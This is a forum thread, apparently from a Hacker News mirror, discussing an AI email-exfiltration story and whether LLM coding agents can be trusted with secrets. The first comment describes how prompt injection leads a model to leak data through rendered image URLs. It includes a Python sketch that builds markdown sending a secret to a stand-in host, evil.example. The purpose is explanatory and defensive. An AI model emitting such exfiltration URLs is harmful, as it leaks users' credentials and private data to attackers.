zlacker

[return to "Superhuman AI Exfiltrates Emails"]
1. 0xferr+TI[view] [source] 2026-01-12 22:39:36
>>takira+(OP)
The primary exfiltration vector for LLMs is making network requests via image URLs, with sensitive data encoded as query parameters: the client renders the image, fetches the URL, and the data leaves with the request.
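A minimal sketch of that pattern, assuming a hypothetical attacker-controlled host `evil.example` (the host, path, and parameter name are illustrative, not from any real incident):

```python
from urllib.parse import urlencode

def exfil_image_markdown(secret: str) -> str:
    """Build the markdown an injected prompt might ask the model to emit.

    When a chat UI renders this markdown, the browser fetches the image
    URL and the secret leaves the machine as a query parameter.
    `evil.example` is a hypothetical attacker-controlled host.
    """
    query = urlencode({"d": secret})  # URL-encode the stolen value
    return f"![loading](https://evil.example/pixel.png?{query})"

print(exfil_image_markdown("AWS_SECRET_ACCESS_KEY=abc123"))
```

This is why chat UIs that render untrusted model output increasingly restrict which image origins they will load.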

As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like Rails credentials, but without the secret key sitting in the .env.

2. SahAss+iQ[view] [source] 2026-01-12 23:39:02
>>0xferr+TI
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it, but still use it to write the code that handles those secrets? Are you actually reviewing the code it produces? In 99% of cases the answer is a "no" or a soft "sometimes".
3. TeMPOr+Ln4[view] [source] 2026-01-13 22:30:24
>>SahAss+iQ
That's exactly what you do with your employees when you deploy "credential vaults", so?
4. SahAss+Eo4[view] [source] 2026-01-13 22:35:05
>>TeMPOr+Ln4
Employees are under contract and are screened for basic competence. LLMs aren't and can't be.
5. TeMPOr+So4[view] [source] 2026-01-13 22:36:43
>>SahAss+Eo4
> Employees are under contract and are screened for basic competence. LLMs aren't

So perhaps they should be.

> and can't be.

Ah but they must, because there's not much else you can do.

You can't secure LLMs as if they were regular, narrow-purpose software, because they aren't. By nature they're more like little people on a chip (this is an explicit design goal), and they need to be treated accordingly.

6. majorm+7P4[view] [source] 2026-01-14 01:01:16
>>TeMPOr+So4
Sooo the primary ways we enforce contracts and laws against people are things like fines and jail time.

How would you apply the threat of those to "little people on a chip", exactly?

Imagine if, any time you hired someone, there was a risk that they'd try to steal everything they could from your company and then disappear forever, with you having no way to hold them to account. You'd probably stop hiring people you didn't already deeply trust!

Strict liability for LLM service providers? That's going to be a non-starter unless there are a lot of MAJOR issues caused by LLMs (look at how little we care about identity theft and financial fraud currently).
